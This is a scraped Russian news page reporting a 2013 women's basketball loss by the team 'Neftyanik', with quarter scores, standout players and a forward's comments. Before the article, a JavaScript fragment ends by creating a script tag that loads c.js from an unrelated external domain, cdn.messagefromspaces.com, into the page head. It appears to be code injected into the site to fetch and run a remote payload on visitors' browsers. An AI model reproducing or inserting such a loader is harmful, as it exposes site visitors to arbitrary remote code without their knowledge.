, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
22 января, 2013 Спорт

«Нефтяник» потерпел поражение

«Нефтяник» потерпел поражение.

Наиболее результативным игроком «Нефтяника» в этом матче стала Галина Литвиненко, набравшая 16 очков.

В первой части встречи преимущество было на стороне гостей, второй достаточно малорезультативный период они выиграли со счетом 9:7. Было заметно, что «Нефтянику» не хватает высоких игроков. Самое большое количество подборов за матч заработала защитник Дарья Филимонова, рост которой 177 см.

После перерыва игра стала активнее. В третьем периоде «Нефтяник» уступил только на одну позицию – 17:18. Четвертый был выигран со счетом 13:9. Игру омской команды оживила Алена Чурсина, которая сразу отличилась двумя точными попаданиями. Старательно играла и Дарья Королева, однако ей не хватало точности в завершении атак.

В конце поединка при счете 50:52 уйти в отрыв могла Ирина Осталова, однако забить она не смогла.

По словам форварда «Нефтяника» Ирины Алехиной, в этот раз команда очень неудачно сыграла в первой четверти. Процент попаданий был довольно низким, поэтому выигрывать было сложно. Также она отметила, что довольно сложно играть против высокорослых спортсменок вроде Никитиной и Бекметовой. Но Ирина подчеркнула, что команда сделала все возможное.

Повторный матч соперники будут играть сегодня. Игра начинается в 17:30.